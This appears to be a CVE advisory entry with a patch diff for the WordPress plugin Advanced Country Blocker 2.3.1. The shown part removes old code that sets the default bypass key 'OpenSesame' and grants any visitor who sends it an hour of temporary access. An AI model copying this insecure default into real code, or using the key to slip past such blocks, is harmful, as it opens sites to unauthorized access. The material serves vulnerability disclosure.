CVE-2026-1675: Advanced Country Blocker <= 2.3.1 – Unauthenticated Authorization Bypass via Insecure Default Secret Key (advanced-country-blocker)

--- a/advanced-country-blocker/advanced-country-blocking.php
+++ b/advanced-country-blocker/advanced-country-blocking.php
@@ -1,3775 +1,4042 @@
-<?php
-/**
- * Plugin Name: Advanced Country Blocker
- * Plugin URI: https://sparkcan.com/acb.html
- * Description: Blocks all traffic to the website unless it meets the country filtering rules or accesses via a secret URL parameter. On activation, the admin’s country is auto‐added to the country list. Supports logging, blacklisting of IP addresses, custom block page, admin bypass, and optional email alerts. You can choose whether the country list acts as an allow‑list or a block‑list.
- * Version: 2.3.1
- * Author: Sparkcan
- * Author URI: https://sparkcan.com
- * License: GPLv3 or later
- * License URI: https://www.gnu.org/licenses/gpl-3.0.html
- */
-
-if ( ! defined( 'ABSPATH' ) ) {
-        exit; // Exit if accessed directly
-}
-
-require_once plugin_dir_path( __FILE__ ) . 'includes/class-advcb-geoip-locator.php';
-
-add_action( 'plugins_loaded', 'advcb_load_textdomain' );
-function advcb_load_textdomain() {
-        load_plugin_textdomain( 'advcb', false, dirname( plugin_basename( __FILE__ ) ) . '/languages/' );
-}
-
-/**
- * HELPER FUNCTION: Returns an array of ISO country codes mapped to country names.
- */
-function advcb_get_countries() {
-	return array(
-		''   => 'Select a country',
-		'AF' => 'Afghanistan',
-		'AL' => 'Albania',
-		'DZ' => 'Algeria',
-		'AS' => 'American Samoa',
-		'AD' => 'Andorra',
-		'AO' => 'Angola',
-		'AI' => 'Anguilla',
-		'AQ' => 'Antarctica',
-		'AG' => 'Antigua and Barbuda',
-		'AR' => 'Argentina',
-		'AM' => 'Armenia',
-		'AW' => 'Aruba',
-		'AU' => 'Australia',
-		'AT' => 'Austria',
-		'AZ' => 'Azerbaijan',
-		'BS' => 'Bahamas',
-		'BH' => 'Bahrain',
-		'BD' => 'Bangladesh',
-		'BB' => 'Barbados',
-		'BY' => 'Belarus',
-		'BE' => 'Belgium',
-		'BZ' => 'Belize',
-		'BJ' => 'Benin',
-		'BM' => 'Bermuda',
-		'BT' => 'Bhutan',
-		'BO' => 'Bolivia',
-		'BA' => 'Bosnia and Herzegovina',
-		'BW' => 'Botswana',
-		'BR' => 'Brazil',
-		'BN' => 'Brunei',
-		'BG' => 'Bulgaria',
-		'BF' => 'Burkina Faso',
-		'BI' => 'Burundi',
-		'KH' => 'Cambodia',
-		'CM' => 'Cameroon',
-		'CA' => 'Canada',
-		'CV' => 'Cape Verde',
-		'KY' => 'Cayman Islands',
-		'CF' => 'Central African Republic',
-		'TD' => 'Chad',
-		'CL' => 'Chile',
-		'CN' => 'China',
-		'CO' => 'Colombia',
-		'KM' => 'Comoros',
-		'CG' => 'Congo - Brazzaville',
-		'CD' => 'Congo - Kinshasa',
-		'CR' => 'Costa Rica',
-		'CI' => 'Côte d’Ivoire',
-		'HR' => 'Croatia',
-		'CU' => 'Cuba',
-		'CY' => 'Cyprus',
-		'CZ' => 'Czech Republic',
-		'DK' => 'Denmark',
-		'DJ' => 'Djibouti',
-		'DM' => 'Dominica',
-		'DO' => 'Dominican Republic',
-		'EC' => 'Ecuador',
-		'EG' => 'Egypt',
-		'SV' => 'El Salvador',
-		'GQ' => 'Equatorial Guinea',
-		'ER' => 'Eritrea',
-		'EE' => 'Estonia',
-		'ET' => 'Ethiopia',
-		'FJ' => 'Fiji',
-		'FI' => 'Finland',
-		'FR' => 'France',
-		'GF' => 'French Guiana',
-		'PF' => 'French Polynesia',
-		'GA' => 'Gabon',
-		'GM' => 'Gambia',
-		'GE' => 'Georgia',
-		'DE' => 'Germany',
-		'GH' => 'Ghana',
-		'GI' => 'Gibraltar',
-		'GR' => 'Greece',
-		'GL' => 'Greenland',
-		'GD' => 'Grenada',
-		'GP' => 'Guadeloupe',
-		'GU' => 'Guam',
-		'GT' => 'Guatemala',
-		'GG' => 'Guernsey',
-		'GN' => 'Guinea',
-		'GW' => 'Guinea-Bissau',
-		'GY' => 'Guyana',
-		'HT' => 'Haiti',
-		'HN' => 'Honduras',
-		'HK' => 'Hong Kong',
-		'HU' => 'Hungary',
-		'IS' => 'Iceland',
-		'IN' => 'India',
-		'ID' => 'Indonesia',
-		'IR' => 'Iran',
-		'IQ' => 'Iraq',
-		'IE' => 'Ireland',
-		'IM' => 'Isle of Man',
-		'IL' => 'Israel',
-		'IT' => 'Italy',
-		'JM' => 'Jamaica',
-		'JP' => 'Japan',
-		'JE' => 'Jersey',
-		'JO' => 'Jordan',
-		'KZ' => 'Kazakhstan',
-		'KE' => 'Kenya',
-		'KI' => 'Kiribati',
-		'KP' => 'North Korea',
-		'KR' => 'South Korea',
-		'KW' => 'Kuwait',
-		'KG' => 'Kyrgyzstan',
-		'LA' => 'Laos',
-		'LV' => 'Latvia',
-		'LB' => 'Lebanon',
-		'LS' => 'Lesotho',
-		'LR' => 'Liberia',
-		'LY' => 'Libya',
-		'LI' => 'Liechtenstein',
-		'LT' => 'Lithuania',
-		'LU' => 'Luxembourg',
-		'MO' => 'Macao',
-		'MK' => 'North Macedonia',
-		'MG' => 'Madagascar',
-		'MW' => 'Malawi',
-		'MY' => 'Malaysia',
-		'MV' => 'Maldives',
-		'ML' => 'Mali',
-		'MT' => 'Malta',
-		'MH' => 'Marshall Islands',
-		'MQ' => 'Martinique',
-		'MR' => 'Mauritania',
-		'MU' => 'Mauritius',
-		'MX' => 'Mexico',
-		'FM' => 'Micronesia',
-		'MD' => 'Moldova',
-		'MC' => 'Monaco',
-		'MN' => 'Mongolia',
-		'ME' => 'Montenegro',
-		'MA' => 'Morocco',
-		'MZ' => 'Mozambique',
-		'MM' => 'Myanmar (Burma)',
-		'NA' => 'Namibia',
-		'NR' => 'Nauru',
-		'NP' => 'Nepal',
-		'NL' => 'Netherlands',
-		'NC' => 'New Caledonia',
-		'NZ' => 'New Zealand',
-		'NI' => 'Nicaragua',
-		'NE' => 'Niger',
-		'NG' => 'Nigeria',
-		'NO' => 'Norway',
-		'OM' => 'Oman',
-		'PK' => 'Pakistan',
-		'PW' => 'Palau',
-		'PS' => 'Palestinian Territories',
-		'PA' => 'Panama',
-		'PG' => 'Papua New Guinea',
-		'PY' => 'Paraguay',
-		'PE' => 'Peru',
-		'PH' => 'Philippines',
-		'PL' => 'Poland',
-		'PT' => 'Portugal',
-		'QA' => 'Qatar',
-		'RO' => 'Romania',
-		'RU' => 'Russia',
-		'RW' => 'Rwanda',
-		'SM' => 'San Marino',
-		'SA' => 'Saudi Arabia',
-		'SN' => 'Senegal',
-		'RS' => 'Serbia',
-		'SC' => 'Seychelles',
-		'SL' => 'Sierra Leone',
-		'SG' => 'Singapore',
-		'SK' => 'Slovakia',
-		'SI' => 'Slovenia',
-		'SB' => 'Solomon Islands',
-		'SO' => 'Somalia',
-		'ZA' => 'South Africa',
-		'ES' => 'Spain',
-		'LK' => 'Sri Lanka',
-		'SD' => 'Sudan',
-		'SR' => 'Suriname',
-		'SE' => 'Sweden',
-		'CH' => 'Switzerland',
-		'SY' => 'Syria',
-		'TW' => 'Taiwan',
-		'TJ' => 'Tajikistan',
-		'TZ' => 'Tanzania',
-		'TH' => 'Thailand',
-		'TL' => 'Timor-Leste',
-		'TG' => 'Togo',
-		'TO' => 'Tonga',
-		'TT' => 'Trinidad and Tobago',
-		'TN' => 'Tunisia',
-		'TR' => 'Turkey',
-		'TM' => 'Turkmenistan',
-		'UG' => 'Uganda',
-		'UA' => 'Ukraine',
-		'AE' => 'United Arab Emirates',
-		'GB' => 'United Kingdom',
-		'US' => 'United States',
-		'UY' => 'Uruguay',
-		'UZ' => 'Uzbekistan',
-		'VU' => 'Vanuatu',
-		'VE' => 'Venezuela',
-		'VN' => 'Vietnam',
-		'YE' => 'Yemen',
-		'ZM' => 'Zambia',
-		'ZW' => 'Zimbabwe'
-	);
-}
-
-/**
- * Plugin Activation:
- * 1) Detect the activating admin’s IP and set that country in the country list.
- * 2) Create a custom DB table to log blocked attempts.
- * 3) Set default options including the filtering mode and logging.
- */
-register_activation_hook( __FILE__, 'advcb_plugin_activation' );
-function advcb_plugin_activation() {
-	// Set the activating admin's country (fallback is RS)
-	$admin_ip     = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : '';
-	$country_code = 'RS';
-
-        if ( ! empty( $admin_ip ) ) {
-                $detected_country = advcb_get_country_code_for_ip( $admin_ip );
-                if ( ! empty( $detected_country ) ) {
-                        $country_code = $detected_country;
-                }
-        }
-	// In allow mode, the admin’s country is the only allowed country.
-	update_option( 'advcb_allowed_countries', array( $country_code ) );
-
-	// Create DB table for logs.
-	global $wpdb;
-	$table_name      = $wpdb->prefix . 'advcb_block_logs';
-	$charset_collate = $wpdb->get_charset_collate();
-
-	$sql = "CREATE TABLE IF NOT EXISTS $table_name (
-        id bigint(20) unsigned NOT NULL AUTO_INCREMENT,
-        ip varchar(100) NOT NULL,
-        country_code varchar(5) DEFAULT '' NOT NULL,
-        blocked_time datetime DEFAULT CURRENT_TIMESTAMP NOT NULL,
-        reason varchar(255) DEFAULT '' NOT NULL,
-        PRIMARY KEY (id)
-    ) $charset_collate;";
-
-	require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
-	dbDelta( $sql );
-
-	// Set default options.
-        add_option( 'advcb_secret_key', 'OpenSesame' );
-        add_option( 'advcb_blacklisted_ips', array() );
-        add_option( 'advcb_trusted_ips', array() );
-        add_option( 'advcb_send_email_alerts', false );
-        add_option( 'advcb_alert_email', get_option( 'admin_email' ) );
-        add_option( 'advcb_mode', 'allow' );
-        // New option: enable logging (default true).
-        add_option( 'advcb_enable_logs', true );
-        add_option( 'advcb_block_page_title', 'Access Restricted' );
-        add_option( 'advcb_block_message', 'We’re sorry, but your location is not allowed to view this site.' );
-        add_option( 'advcb_enable_redirect', false );
-        add_option( 'advcb_redirect_url', '' );
-        add_option( 'advcb_redirect_status_code', 302 );
-        add_option( 'advcb_http_status_code', 403 );
-        add_option( 'advcb_log_retention_days', 30 );
-        add_option( 'advcb_geoip_source', 'api' );
-        add_option( 'advcb_geoip_db_path', '' );
-        // CAPTCHA challenge options.
-        add_option( 'advcb_enable_captcha', false );
-        add_option( 'advcb_captcha_provider', 'recaptcha_v2' );
-        add_option( 'advcb_captcha_site_key', '' );
-        add_option( 'advcb_captcha_secret_key', '' );
-        add_option( 'advcb_captcha_duration', 24 ); // Hours
-        add_option( 'advcb_captcha_threshold', 0.5 ); // For reCAPTCHA v3
-
-        if ( ! wp_next_scheduled( 'advcb_cleanup_logs_event' ) ) {
-                wp_schedule_event( time(), 'daily', 'advcb_cleanup_logs_event' );
-        }
-}
-
-register_deactivation_hook( __FILE__, 'advcb_plugin_deactivation' );
-function advcb_plugin_deactivation() {
-        wp_clear_scheduled_hook( 'advcb_cleanup_logs_event' );
-}
-
-add_action( 'init', 'advcb_ensure_cleanup_schedule' );
-function advcb_ensure_cleanup_schedule() {
-        if ( ! wp_next_scheduled( 'advcb_cleanup_logs_event' ) ) {
-                wp_schedule_event( time(), 'daily', 'advcb_cleanup_logs_event' );
-        }
-}
-
-/**
- * MAIN BLOCKING LOGIC
- */
-function advcb_block_non_allowed_countries() {
-	// Allow admins to bypass the blocking logic.
-	if ( is_user_logged_in() && current_user_can( 'manage_options' ) ) {
-		return;
-	}
-
-	// Allow CAPTCHA verification AJAX requests to pass through.
-	if ( wp_doing_ajax() && isset( $_REQUEST['action'] ) && 'advcb_verify_captcha' === $_REQUEST['action'] ) {
-		return;
-	}
-
-	// Retrieve settings.
-	$allowed_countries       = get_option( 'advcb_allowed_countries', array() );
-	$secret_key              = get_option( 'advcb_secret_key', 'OpenSesame' );
-	$temporary_access_duration = HOUR_IN_SECONDS;
-        $blacklisted_ips         = get_option( 'advcb_blacklisted_ips', array() );
-        $trusted_ips             = get_option( 'advcb_trusted_ips', array() );
-	$send_email_alerts       = get_option( 'advcb_send_email_alerts', false );
-	$alert_email             = get_option( 'advcb_alert_email', get_option( 'admin_email' ) );
-	$mode                    = get_option( 'advcb_mode', 'allow' ); // 'allow' or 'block'
-
-	// Get visitor's IP address, properly handling proxy headers.
-	// Uses WordPress function which respects trusted proxies and prevents spoofing.
-	if ( function_exists( 'wp_http_get_original_ip' ) ) {
-		$ip = wp_http_get_original_ip();
-	} else {
-		// Fallback for older WordPress versions.
-		$ip = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : 'unknown';
-	}
-
-	// Validate IP format to prevent invalid IPs from being processed.
-	if ( ! filter_var( $ip, FILTER_VALIDATE_IP ) ) {
-		$ip = 'unknown';
-	}
-
-        if ( ! is_array( $blacklisted_ips ) ) {
-                $blacklisted_ips = explode( ',', $blacklisted_ips );
-        }
-        if ( ! is_array( $trusted_ips ) ) {
-                $trusted_ips = explode( ',', $trusted_ips );
-        }
-
-        $blacklisted_ips = array_map( 'trim', $blacklisted_ips );
-        $trusted_ips     = array_map( 'trim', $trusted_ips );
-
-        // 1) Check if IP is whitelisted explicitly.
-        if ( in_array( $ip, $trusted_ips, true ) ) {
-                return;
-        }
-
-        // 2) Check if IP is blacklisted.
-        if ( in_array( $ip, $blacklisted_ips, true ) ) {
-                $reason = __( 'Blacklisted IP', 'advcb' );
-                advcb_record_block( $ip, 'XX', $reason, $send_email_alerts, $alert_email );
-                advcb_show_block_page( array(
-                        'ip'           => $ip,
-                        'country_code' => 'XX',
-                        'reason'       => $reason,
-                ) );
-                exit;
-        }
-
-        // 3) Check if IP is in the temporary whitelist.
-        $whitelisted_ips = get_transient( 'advcb_whitelisted_ips' );
-        if ( is_array( $whitelisted_ips ) && in_array( $ip, $whitelisted_ips ) ) {
-                return; // temporary access granted
-	}
-
-        // 3.5) Check if IP has passed CAPTCHA challenge.
-        if ( advcb_is_captcha_verified( $ip ) ) {
-                return;
-        }
-
-        // 4) Determine visitor's country code.
-	$country_cache_key = 'advcb_country_' . md5( $ip );
-	$country_code      = get_transient( $country_cache_key );
-
-        if ( ! $country_code ) {
-                $country_code = advcb_get_country_code_for_ip( $ip );
-
-                if ( $country_code ) {
-                        set_transient( $country_cache_key, $country_code, DAY_IN_SECONDS );
-                } else {
-                        // If we cannot determine the visitor's country, allow access to avoid blocking legitimate users.
-                        return;
-                }
-        }
-
-        /*
-         * 5) Country Filtering Logic:
-	 * In "allow" mode: if the visitor’s country is NOT in the list, then block.
-	 * In "block" mode: if the visitor’s country IS in the list, then block.
-	 * In both cases, if the secret key parameter is provided, grant temporary access.
-	 */
-	if ( $country_code ) {
-		if ( $mode === 'allow' && ! in_array( $country_code, $allowed_countries ) ) {
-			// Check if the secret key parameter exists and has a truthy value.
-			if ( isset( $_GET[ $secret_key ] ) && '1' === $_GET[ $secret_key ] ) {
-				// Grant temporary access.
-				if ( ! is_array( $whitelisted_ips ) ) {
-					$whitelisted_ips = array();
-				}
-				$whitelisted_ips[] = $ip;
-				$whitelisted_ips = array_unique( $whitelisted_ips );
-				set_transient( 'advcb_whitelisted_ips', $whitelisted_ips, $temporary_access_duration );
-
-				// Optional: enqueue a redirect alert.
-                                add_action( 'wp_enqueue_scripts', function() use ( $secret_key ) {
-                                        wp_enqueue_script( 'advcb-alert', plugin_dir_url( __FILE__ ) . 'advcb-alert.js', array(), '1.0', true );
-					wp_localize_script( 'advcb-alert', 'advcb_redirect', array(
-						'url' => esc_url( remove_query_arg( $secret_key ) ),
-					) );
-				} );
-				return;
-			}
-
-                        $reason = __( 'Country not allowed', 'advcb' );
-                        advcb_record_block( $ip, $country_code, $reason, $send_email_alerts, $alert_email );
-
-                        // Check if CAPTCHA challenge is enabled - if so, show CAPTCHA instead of block page.
-                        $captcha_enabled = get_option( 'advcb_enable_captcha', false );
-                        if ( $captcha_enabled ) {
-                                advcb_show_captcha_challenge( array(
-                                        'ip'           => $ip,
-                                        'country_code' => $country_code,
-                                        'reason'       => $reason,
-                                ) );
-                        }
-
-                        advcb_show_block_page( array(
-                                'ip'           => $ip,
-                                'country_code' => $country_code,
-                                'reason'       => $reason,
-                        ) );
-                        exit;
-                } elseif ( $mode === 'block' && in_array( $country_code, $allowed_countries ) ) {
-			// Check if the secret key parameter exists and has a truthy value.
-			if ( isset( $_GET[ $secret_key ] ) && '1' === $_GET[ $secret_key ] ) {
-				// Grant temporary access.
-				if ( ! is_array( $whitelisted_ips ) ) {
-					$whitelisted_ips = array();
-				}
-				$whitelisted_ips[] = $ip;
-				$whitelisted_ips = array_unique( $whitelisted_ips );
-				set_transient( 'advcb_whitelisted_ips', $whitelisted_ips, $temporary_access_duration );
-
-                                add_action( 'wp_enqueue_scripts', function() use ( $secret_key ) {
-                                        wp_enqueue_script( 'advcb-alert', plugin_dir_url( __FILE__ ) . 'advcb-alert.js', array(), '1.0', true );
-					wp_localize_script( 'advcb-alert', 'advcb_redirect', array(
-						'url' => esc_url( remove_query_arg( $secret_key ) ),
-					) );
-				} );
-				return;
-			}
-
-                        $reason = __( 'Country blocked', 'advcb' );
-                        advcb_record_block( $ip, $country_code, $reason, $send_email_alerts, $alert_email );
-
-                        // Check if CAPTCHA challenge is enabled - if so, show CAPTCHA instead of block page.
-                        $captcha_enabled = get_option( 'advcb_enable_captcha', false );
-                        if ( $captcha_enabled ) {
-                                advcb_show_captcha_challenge( array(
-                                        'ip'           => $ip,
-                                        'country_code' => $country_code,
-                                        'reason'       => $reason,
-                                ) );
-                        }
-
-                        advcb_show_block_page( array(
-                                'ip'           => $ip,
-                                'country_code' => $country_code,
-                                'reason'       => $reason,
-                        ) );
-                        exit;
-                }
-        }
-}
-add_action( 'init', 'advcb_block_non_allowed_countries' );
-
-/**
- * RECORD BLOCKED ATTEMPT IN DATABASE & (optionally) SEND EMAIL
- */
-function advcb_record_block( $ip, $country_code, $reason, $send_email_alerts, $alert_email ) {
-	// Check if logging is enabled.
-	if ( ! get_option( 'advcb_enable_logs', true ) ) {
-		// Logging is disabled; optionally still send an email alert.
-		if ( $send_email_alerts && ! empty( $alert_email ) ) {
-			$subject = 'Country Blocker Alert: A visitor was blocked';
-			$message = sprintf(
-				"A visitor from IP: %s (country: %s) was blocked.nReason: %snTime: %s",
-				$ip,
-				$country_code,
-				$reason,
-				current_time( 'mysql' )
-			);
-			wp_mail( $alert_email, $subject, $message );
-		}
-		return;
-	}
-
-	global $wpdb;
-	$table_name = $wpdb->prefix . 'advcb_block_logs';
-
-	$wpdb->insert( $table_name, array(
-		'ip'           => $ip,
-		'country_code' => $country_code ?: '',
-		'reason'       => $reason,
-	), array( '%s', '%s', '%s' ) );
-
-        if ( $send_email_alerts && ! empty( $alert_email ) ) {
-                $subject = 'Country Blocker Alert: A visitor was blocked';
-                $message = sprintf(
-                        "A visitor from IP: %s (country: %s) was blocked.nReason: %snTime: %s",
-                        $ip,
-                        $country_code,
-                        $reason,
-                        current_time( 'mysql' )
-                );
-                wp_mail( $alert_email, $subject, $message );
-        }
-}
-
-/**
- * SHOW A CUSTOM BLOCK PAGE (instead of default 403).
- */
-function advcb_show_block_page( $context = array() ) {
-        $redirect_enabled = (bool) get_option( 'advcb_enable_redirect', false );
-        $redirect_url     = get_option( 'advcb_redirect_url', '' );
-
-        if ( $redirect_enabled && ! empty( $redirect_url ) ) {
-                $redirect_status = (int) get_option( 'advcb_redirect_status_code', 302 );
-                $allowed_redirect_statuses = array( 301, 302, 307, 308 );
-
-                if ( ! in_array( $redirect_status, $allowed_redirect_statuses, true ) ) {
-                        $redirect_status = 302;
-                }
-
-                wp_safe_redirect( esc_url_raw( $redirect_url ), $redirect_status );
-                exit;
-        }
-
-        $title       = get_option( 'advcb_block_page_title', 'Access Restricted' );
-        $message     = get_option( 'advcb_block_message', 'We’re sorry, but your location is not allowed to view this site.' );
-        $status_code = (int) get_option( 'advcb_http_status_code', 403 );
-
-        $message     = advcb_replace_placeholders( $message, $context );
-        $status_code = in_array( $status_code, apply_filters( 'advcb_allowed_http_status_codes', array( 403, 410, 451 ) ), true )
-                ? $status_code
-                : 403;
-
-        $content = '<h1>' . esc_html( $title ) . '</h1>' . wpautop( wp_kses_post( $message ) );
-
-        wp_die(
-                $content,
-                esc_html( $title ),
-                array( 'response' => $status_code )
-        );
-}
-
-/**
- * REGISTER/INITIALIZE SETTINGS
- */
-function advcb_register_settings() {
-	// Register and sanitize the country codes list.
-	register_setting( 'advcb_options_group', 'advcb_allowed_countries', array(
-		'sanitize_callback' => 'advcb_sanitize_allowed_countries',
-	) );
-
-	// Register and sanitize secret key.
-	register_setting( 'advcb_options_group', 'advcb_secret_key', array(
-		'sanitize_callback' => 'sanitize_text_field',
-	) );
-
-	// Register and sanitize blacklisted IPs.
-        register_setting( 'advcb_options_group', 'advcb_blacklisted_ips', array(
-                'sanitize_callback' => 'advcb_sanitize_blacklisted_ips',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_trusted_ips', array(
-                'sanitize_callback' => 'advcb_sanitize_blacklisted_ips',
-        ) );
-
-        // Register and sanitize email alert toggle.
-        register_setting( 'advcb_options_group', 'advcb_send_email_alerts', array(
-                'sanitize_callback' => 'advcb_sanitize_boolean',
-        ) );
-
-	// Register and sanitize alert email.
-	register_setting( 'advcb_options_group', 'advcb_alert_email', array(
-		'sanitize_callback' => 'sanitize_email',
-	) );
-
-        // Register and sanitize the filtering mode.
-        register_setting( 'advcb_options_group', 'advcb_mode', array(
-                'sanitize_callback' => 'advcb_sanitize_mode',
-        ) );
-
-        // Register and sanitize the logging option.
-        register_setting( 'advcb_options_group', 'advcb_enable_logs', array(
-                'sanitize_callback' => 'advcb_sanitize_boolean',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_block_page_title', array(
-                'sanitize_callback' => 'sanitize_text_field',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_block_message', array(
-                'sanitize_callback' => 'advcb_sanitize_textarea',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_http_status_code', array(
-                'sanitize_callback' => 'advcb_sanitize_http_status',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_enable_redirect', array(
-                'sanitize_callback' => 'advcb_sanitize_boolean',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_redirect_url', array(
-                'sanitize_callback' => 'advcb_sanitize_url',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_redirect_status_code', array(
-                'sanitize_callback' => 'advcb_sanitize_redirect_status',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_log_retention_days', array(
-                'sanitize_callback' => 'advcb_sanitize_positive_int',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_geoip_source', array(
-                'sanitize_callback' => 'advcb_sanitize_geoip_source',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_geoip_db_path', array(
-                'sanitize_callback' => 'advcb_sanitize_file_path',
-        ) );
-
-        // Register CAPTCHA challenge settings.
-        register_setting( 'advcb_options_group', 'advcb_enable_captcha', array(
-                'sanitize_callback' => 'advcb_sanitize_boolean',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_captcha_provider', array(
-                'sanitize_callback' => 'advcb_sanitize_captcha_provider',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_captcha_site_key', array(
-                'sanitize_callback' => 'sanitize_text_field',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_captcha_secret_key', array(
-                'sanitize_callback' => 'advcb_sanitize_captcha_secret_key',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_captcha_duration', array(
-                'sanitize_callback' => 'advcb_sanitize_positive_int',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_captcha_threshold', array(
-                'sanitize_callback' => 'advcb_sanitize_captcha_threshold',
-        ) );
-}
-add_action( 'admin_init', 'advcb_register_settings' );
-
-/**
- * Clean up log entries based on retention setting.
- */
-function advcb_cleanup_logs() {
-        $retention_days = absint( get_option( 'advcb_log_retention_days', 30 ) );
-
-        if ( $retention_days <= 0 ) {
-                return;
-        }
-
-        global $wpdb;
-        $table_name = $wpdb->prefix . 'advcb_block_logs';
-
-        $threshold = gmdate( 'Y-m-d H:i:s', time() - ( $retention_days * DAY_IN_SECONDS ) );
-
-        $wpdb->query( $wpdb->prepare( "DELETE FROM $table_name WHERE blocked_time < %s", $threshold ) );
-}
-add_action( 'advcb_cleanup_logs_event', 'advcb_cleanup_logs' );
-
-/**
- * ADD MENU PAGE
- */
-function advcb_register_options_page() {
-	add_menu_page(
-		'Country Blocker',
-		'Country Blocker',
-		'manage_options',
-		'advcb_settings',
-		'advcb_options_page',
-		'dashicons-location-alt',
-		60
-	);
-
-	// Add a sub-page for logs.
-	add_submenu_page(
-		'advcb_settings',
-		'Block Logs',
-		'Block Logs',
-		'manage_options',
-		'advcb_block_logs',
-		'advcb_block_logs_page'
-	);
-
-	// Add a sub-page for analytics dashboard.
-	add_submenu_page(
-		'advcb_settings',
-		'Analytics Dashboard',
-		'Analytics',
-		'manage_options',
-		'advcb_analytics',
-		'advcb_analytics_dashboard_page'
-	);
-
-	// Add a sub-page for real-time activity monitor.
-	add_submenu_page(
-		'advcb_settings',
-		'Real-Time Monitor',
-		'Live Monitor',
-		'manage_options',
-		'advcb_live_monitor',
-		'advcb_live_monitor_page'
-	);
-}
-add_action( 'admin_menu', 'advcb_register_options_page' );
-
-/**
- * MAIN SETTINGS PAGE with Dynamic Country Select Boxes
- */
-function advcb_options_page() {
-	// Get current filtering mode to adjust labels.
-	$mode       = get_option( 'advcb_mode', 'allow' );
-	$list_label = ( $mode === 'block' ) ? 'Blocked Country Codes' : 'Allowed Country Codes';
-        $list_desc  = ( $mode === 'block' )
-                ? 'Select ISO country codes that should be blocked from accessing the site. Everyone else will be allowed automatically.'
-                : 'Select ISO country codes that are allowed to access the site. Visitors from all other countries will be blocked.';
-
-	// Retrieve the saved countries. Ensure we have an array.
-	$selected_countries = get_option( 'advcb_allowed_countries', array() );
-	if ( ! is_array( $selected_countries ) ) {
-		$selected_countries = explode( ',', $selected_countries );
-	}
-	// Always display at least one select box.
-	if ( empty( $selected_countries ) ) {
-		$selected_countries = array( '' );
-	}
-
-	// Get the complete list of countries.
-	$countries = advcb_get_countries();
-
-	$trusted_ips = get_option( 'advcb_trusted_ips', array() );
-	if ( is_array( $trusted_ips ) ) {
-		$trusted_ips = implode( ',', array_filter( array_map( 'trim', $trusted_ips ) ) );
-	}
-
-	$geoip_source      = get_option( 'advcb_geoip_source', 'api' );
-	$geoip_db_path     = advcb_get_geoip_database_path();
-	$geoip_db_readable = $geoip_db_path && file_exists( $geoip_db_path ) && is_readable( $geoip_db_path );
-	$geoip_storage_dir = advcb_get_geoip_storage_dir();
-
-	$block_page_title    = get_option( 'advcb_block_page_title', 'Access Restricted' );
-	$block_message       = get_option( 'advcb_block_message', 'We're sorry, but your location is not allowed to view this site.' );
-	$http_status_code    = (int) get_option( 'advcb_http_status_code', 403 );
-	$enable_redirect     = (bool) get_option( 'advcb_enable_redirect', false );
-	$redirect_url        = get_option( 'advcb_redirect_url', '' );
-	$redirect_status     = (int) get_option( 'advcb_redirect_status_code', 302 );
-	$log_retention_days  = absint( get_option( 'advcb_log_retention_days', 30 ) );
-
-	// Get current secret key for display.
-	$current_secret_key = get_option( 'advcb_secret_key', 'OpenSesame' );
-
-	// CAPTCHA settings.
-	$captcha_enabled      = get_option( 'advcb_enable_captcha', false );
-	$captcha_provider     = get_option( 'advcb_captcha_provider', 'recaptcha_v2' );
-	$captcha_site_key     = get_option( 'advcb_captcha_site_key', '' );
-	$captcha_duration     = get_option( 'advcb_captcha_duration', 24 );
-	$captcha_threshold    = get_option( 'advcb_captcha_threshold', 0.5 );
-	?>
-	<div class="wrap advcb-settings-wrap">
-		<h1><?php esc_html_e( 'Advanced Country Blocker Settings', 'advcb' ); ?></h1>
-
-		<form method="post" action="options.php" id="advcb-settings-form">
-			<?php settings_fields( 'advcb_options_group' ); ?>
-			<?php do_settings_sections( 'advcb_options_group' ); ?>
-
-			<!-- Settings Grid -->
-			<div class="advcb-settings-grid">
-
-				<!-- Country Filtering Card -->
-				<div class="advcb-settings-card">
-					<div class="advcb-card-header">
-						<h2>🌍 <?php esc_html_e( 'Country Filtering', 'advcb' ); ?></h2>
-					</div>
-					<div class="advcb-card-content">
-						<div class="advcb-field-group">
-							<label>
-								<input type="hidden" name="advcb_mode" value="allow">
-								<input type="checkbox" name="advcb_mode" value="block" <?php checked( 'block', get_option( 'advcb_mode', 'allow' ) ); ?> />
-								<span><?php esc_html_e( 'Use Blacklist Mode', 'advcb' ); ?></span>
-							</label>
-							<p class="advcb-field-description">
-								<?php esc_html_e( 'In blacklist mode, the selected countries will be blocked. In allowlist mode (default), only the selected countries can access your site.', 'advcb' ); ?>
-							</p>
-						</div>
-
-						<div class="advcb-field-group">
-							<label><?php echo esc_html( $list_label ); ?></label>
-							<p class="advcb-field-description"><?php echo esc_html( $list_desc ); ?></p>
-							<div id="advcb_country_selector_container">
-								<?php foreach ( $selected_countries as $country ) : ?>
-									<div class="advcb_country_selector">
-										<select name="advcb_allowed_countries[]">
-											<?php foreach ( $countries as $code => $name ) : ?>
-												<option value="<?php echo esc_attr( $code ); ?>" <?php selected( $country, $code ); ?>>
-													<?php echo esc_html( $name ); ?>
-												</option>
-											<?php endforeach; ?>
-										</select>
-										<button type="button" class="button button-small advcb_remove_country">✕</button>
-									</div>
-								<?php endforeach; ?>
-							</div>
-							<button type="button" id="advcb_add_country" class="button button-secondary">
-								+ <?php esc_html_e( 'Add Country', 'advcb' ); ?>
-							</button>
-						</div>
-					</div>
-				</div>
-
-				<!-- GeoIP Settings Card -->
-				<div class="advcb-settings-card">
-					<div class="advcb-card-header">
